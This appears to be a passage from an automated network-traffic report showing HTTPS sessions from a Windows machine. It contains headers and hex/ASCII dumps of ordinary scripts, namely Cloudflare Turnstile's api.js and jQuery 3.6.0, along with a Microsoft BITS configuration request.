                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf872398911c461-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 68 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 68 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 6e 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var f=e[l](h),p=f.value}catch(s){n(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function rt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function U(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var n={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var Ue=300030;var Ve=300031;var q;(function(e){e.MANAGED="managed",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 68 3d 4c 28 4e 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 6b 72 2c 28 66 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,h=L(Nr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(kr,(f=(n=e.displayLanguage)===null||n===void 0?void 0:n.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 68 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 68 26 26 4a 28 73 2c 68 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: uct:Ie=function(c,l,h){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return h&&J(s,h.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(n){return n.__proto__||Object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 56 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(V(r,HTMLScriptElement)&&e.test(r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC1369INData Raw: 61 75 74 6f 22 2c 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: auto",f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback"


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              9192.168.2.449755184.28.90.27443
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ECAcc (lpl/EF45)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-CID: 11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=77556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-CID: 2


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10192.168.2.449758151.101.2.1374431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: code.jquery.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 89501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 2365757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740043-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache-Hits: 5889, 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Timer: S1728414787.620234,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:06 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
